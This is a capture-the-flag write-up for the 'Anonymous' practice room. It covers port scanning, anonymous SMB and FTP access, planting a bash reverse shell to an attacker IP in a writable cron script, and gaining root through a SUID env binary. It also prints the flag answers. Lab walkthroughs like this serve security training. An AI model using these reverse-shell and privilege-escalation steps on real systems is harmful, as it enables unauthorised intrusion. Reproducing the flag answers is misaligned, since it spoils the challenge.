Skip to content

Anonymous Banner

Anonymous

Anonymous

In this room we use our basic Linux and PrivEsc knowledge to gain access to our machine and get root permissions.

More details here.

Pwn

This guide contains the answer and steps necessary to get to them for the Anonymous room. This room is similar to some other room, but I can't remember the name at the moment.

  1. Enumerate the machine. How many ports are open?

We first scan the machine for any open ports with the following command:

nmap -sV 10.10.147.121

Nmap Scan

Click for answer4

  1. What service is running on port 21?

This answer can be found in the previous image.

Click for answerftp

  1. What service is running on ports 139 and 445?

Both these answers can be seen in the previous image above.

Click for answersmb

  1. There's a share on the user's computer. What's it called?

We can use smbclient to identify the shares available on the target machine.

smbclient -NL //10.10.11.32

Smb Shares

To view the contents of this share we can use:

smbclient -N //10.10.11.32/pics

Smb Share

After going through these files, it appears they are just images of some dogs, which have no further use.

SMB Files

Images

Click for answerpics

  1. user.txt

From the nmap scan we found we could connect to the machine through anonymous ftp.

ftp 10.10.75.132

FTP Log In

Looking through the files we see three files in a scripts folder which may be of interest.

FTP Files

We can download them all to our machine to investigate with mget *.

FTP Download Files

Looks like the clean.sh file is a script that runs periodically to remove some files. This gets stored in the log file. We also note that we have write access to this script.

Removed Files Log

Lets find a command for a reverse shell we can add to this files. We can use pentestmonkeys for this.

Reverse Shell Command

We can now append this to the script we downloaded.

bash -i >& /dev/tcp/10.18.78.136/1337 0>&1

Finished Script

Now all we have to do, is upload the file to the server. Set up a listener and wait for the script to run.

put clean.sh

FTP Upload

We can check if the command was added using:

curl ftp://10.10.75.132/scripts/clean.sh

Check Script

Now we setup the listener and wait for the incoming connection to be made.

nc -nlvp 1337

Reverse Shell

Now it is time to navigate to the flag and read its contents.

User Flag

Click for answer90d6f992585815ff991e68748c414740

  1. root.txt

In order for us to gain root on this machine we can look for any binaries which have their SUID bit set. 

find / -perm -4000 2>/dev/null

Shell SUID

We can use GTFOBins to look for any binaries which don't need sudo or a password. From this list we can use /usr/bin/env.

GTFO

Now we can use this command to get root access on the machine.

/usr/bin/env bin/bash -p

Root

After a quick check to verify we are indeed root, we can look at the contents of root.txt.

Root Flag

Click for answer4d930091c31a622a7ed10f27999af363